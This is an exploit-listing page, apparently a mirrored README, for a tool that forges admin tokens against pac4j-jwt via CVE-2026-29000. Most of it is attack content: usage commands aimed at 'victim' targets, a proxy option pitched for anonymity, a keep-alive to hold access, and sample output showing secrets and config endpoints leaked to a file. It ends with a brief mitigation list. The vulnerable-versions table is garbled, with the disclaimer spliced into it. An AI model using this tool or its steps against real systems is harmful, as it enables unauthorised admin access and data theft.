Share
## https://sploitus.com/exploit?id=1FA67007-A54A-5500-B010-59ED98D762FB
# πŸš€ CVE-2026-29000 - pac4j-jwt Authentication Bypass Exploit

[![Python](https://img.shields.io/badge/Python-3.8%2B-blue.svg)](https://www.python.org/)
[![CVSS](https://img.shields.io/badge/CVSS-10.0%20CRITICAL-red.svg)](https://nvd.nist.gov/vuln/detail/CVE-2026-29000)
[![License](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE)
[![Pentesting](https://img.shields.io/badge/Purpose-Red%20Team-orange.svg)](https://github.com/)

> **Professional Edition** - One-Click Admin Forge via JWT alg:none + JWE Encryption

## πŸ“Œ Overview

This exploit weaponizes **CVE-2026-29000**, a critical CVSS 10.0 vulnerability in the **pac4j-jwt** library. By extracting the server's public JWKS key and forging an encrypted JWE token with `alg: none`, it achieves complete authentication bypass and grants full administrative privileges in one click.

### πŸ”₯ Key Features

- βœ… **Zero Authentication Required** - Pre-auth exploitation, no valid creds needed
- βœ… **Automatic JWKS Discovery** - Scans 15+ endpoints, custom path support
- βœ… **RSA Key Extraction** - Fetches public key, converts JWKβ†’PEM on the fly
- βœ… **JWT + JWE Forging** - Creates `alg:none` JWT, wraps in server's own public key
- βœ… **Full Admin Token** - ROLE_ADMIN, admin:true, configurable expiry
- βœ… **Authentication Bypass** - Tests 8+ protected endpoints automatically
- βœ… **Intelligent Info Leak** - Enumerates 20+ sensitive API paths
- βœ… **Session Persistence** - Keep-alive thread maintains access
- βœ… **Proxy Support** - HTTP/HTTPS proxy for anonymity
- βœ… **File Export** - Save forged token + leaked data to files
- βœ… **Retry Mechanism** - Configurable retries for unstable connections
- βœ… **Colored Output** - Professional stage-based visual feedback
- βœ… **Verbose Mode** - Debug logging for troubleshooting
- βœ… **No Hardcoded Delays** - Only retry backoff and keep-alive pings

## 🎯 Vulnerable Versions

| Library | Affected Versions | Patched Versions |
|---------|-------------------|------------------|
| pac4j-jwt |  ⚠️ **Disclaimer**: This tool is for authorized security testing and red-team engagements only.

## πŸ“¦ Installation

```bash
git clone https://github.com/yourusername/CVE-2026-29000-Exploit.git
cd CVE-2026-29000-Exploit
pip install -r requirements.txt
python exploit.py --help

requirements.txt:
text

requests>=2.31.0
urllib3>=2.0.0
pyjwt>=2.8.0
cryptography>=41.0.0
jwcrypto>=1.5.0
colorama>=0.4.6

πŸš€ Usage
Basic One-Shot Exploit
bash

python exploit.py --target https://victim.com:8443

Save Forged Token + Leak Data
bash

python exploit.py -t https://target.corp:9443 -o admin.jwe -l stolen.txt

Verbose Mode with Custom JWKS
bash

python exploit.py -t https://example.com:8080 --jwks /oauth/jwks.json -v

With Proxy and No Keep-Alive
bash

python exploit.py -t https://192.168.1.100:443 --proxy http://127.0.0.1:8080 --no-keep-alive

Custom Keep-Alive Interval
bash

python exploit.py -t https://victim.com:8443 --delay 10 --max-retries 5

SSL Verification Enabled
bash

python exploit.py -t https://legit.com:8443 --ssl-verify

βš™οΈ Command Line Arguments
Argument	Short	Required	Default	Description
--target	-t	Yes	-	Target URL (e.g., https://example.com:8443)
--jwks	-k	No	auto-detect	Custom JWKS endpoint path
--output	-o	No	None	Save forged JWE token to file
--leak	-l	No	leaked_TIMESTAMP.txt	Save leaked data to file
--verbose	-v	No	False	Enable debug output
--proxy	-p	No	None	HTTP/HTTPS proxy
--user-agent	-ua	No	Mozilla/5.0...	Custom User-Agent
--no-keep-alive	-	No	False	Disable session keep-alive
--delay	-	No	5.0	Keep-alive ping interval (seconds)
--max-retries	-	No	3	Max retries per failed request
--ssl-verify	-	No	False	Verify SSL certificates
πŸ“Έ Example Output
text

$ python exploit.py -t https://10.10.10.100:8443 -o backdoor.jwe -l leak.txt

╔══════════════════════════════════════════════════════════════════════════════╗
β•‘     CVE-2026-29000 - pac4j-jwt Authentication Bypass Exploit                 β•‘
β•‘                    The Professional One‑Click Admin Forge                    β•‘
β•‘                              CVSS 10.0 - CRITICAL                            β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

[11:23:15] STAGE 1: Acquiring RSA public key from JWKS
[11:23:15] Probing for JWKS endpoint...
[11:23:16] Found JWKS at /realms/master/protocol/openid-connect/certs
[11:23:16] Successfully extracted RSA public key

[11:23:16] STAGE 2: Crafting JWT with alg:none & encrypting into JWE
[11:23:16] Forged JWE token (truncated): eyJhbGciOiJSU0EtT0FFUC0yNTYiLCJlbmMiOiJBMjU2R0...
[11:23:16] βœ“ Token saved to backdoor.jwe

[11:23:16] STAGE 3: Sending forged JWE as Bearer token
[11:23:17] βœ“ Authentication successful! Access granted to /api/users/me

[11:23:17] STAGE 4: Enumerating accessible endpoints & revealing sensitive data
[11:23:18] βœ“ Leaked: /actuator/env (status 200)
[11:23:18] βœ“ Leaked: /api/users (status 200)
[11:23:18] βœ“ Leaked: /api/secrets (status 200)
[11:23:18] βœ“ Leaked: /config/server (status 200)
[11:23:18] βœ“ Captured 4 sensitive endpoints β†’ saved to leak.txt

[11:23:18] Keep‑alive session active (Ctrl+C to stop)
[11:23:18] Token (JWE) valid for ~1 hour – reforge if expired

🧠 How It Works
text

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  STAGE 1: Public Key Acquisition                                β”‚
β”‚  β”œβ”€β”€ Discover JWKS endpoint (15+ known paths)                  β”‚
β”‚  β”œβ”€β”€ Fetch JWK containing RSA public key                       β”‚
β”‚  └── Convert JWK β†’ PEM format                                   β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  STAGE 2: Token Forging                                         β”‚
β”‚  β”œβ”€β”€ Create JWT with alg: "none"                               β”‚
β”‚  β”œβ”€β”€ Inject admin claims (ROLE_ADMIN, admin: true)             β”‚
β”‚  └── Encrypt JWT into JWE using server's public key            β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  STAGE 3: Authentication Bypass                                 β”‚
β”‚  β”œβ”€β”€ Send JWE as Bearer token                                   β”‚
β”‚  β”œβ”€β”€ Test 8+ protected endpoints                               β”‚
β”‚  └── Extract session cookie                                     β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  STAGE 4: Information Exfiltration                              β”‚
β”‚  β”œβ”€β”€ Enumerate 20+ sensitive API paths                         β”‚
β”‚  β”œβ”€β”€ Collect configs, users, secrets, environment              β”‚
β”‚  └── Save all to leak file                                      β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Keep-Alive: Ping /api/ping every N seconds                     β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

πŸ”§ Manual Token Usage

After exploitation, use the saved JWE token with curl:
bash

curl -H "Authorization: Bearer $(cat backdoor.jwe)" https://target.com/api/admin/users

πŸ›‘οΈ Detection & Mitigation
Detection Method	Indicator
Log Analysis	JWT with alg: none in audit logs
Network Monitoring	JWKS endpoint requests from unknown IPs
Version Check	curl /actuator/info | grep pac4j

Mitigation:

    Update pac4j-jwt to patched versions (β‰₯5.1.5, β‰₯4.5.8, β‰₯3.18.6)

    Disable alg: none support in JWT validator

    Implement strict JWE validation

    Monitor for anomalous JWT structures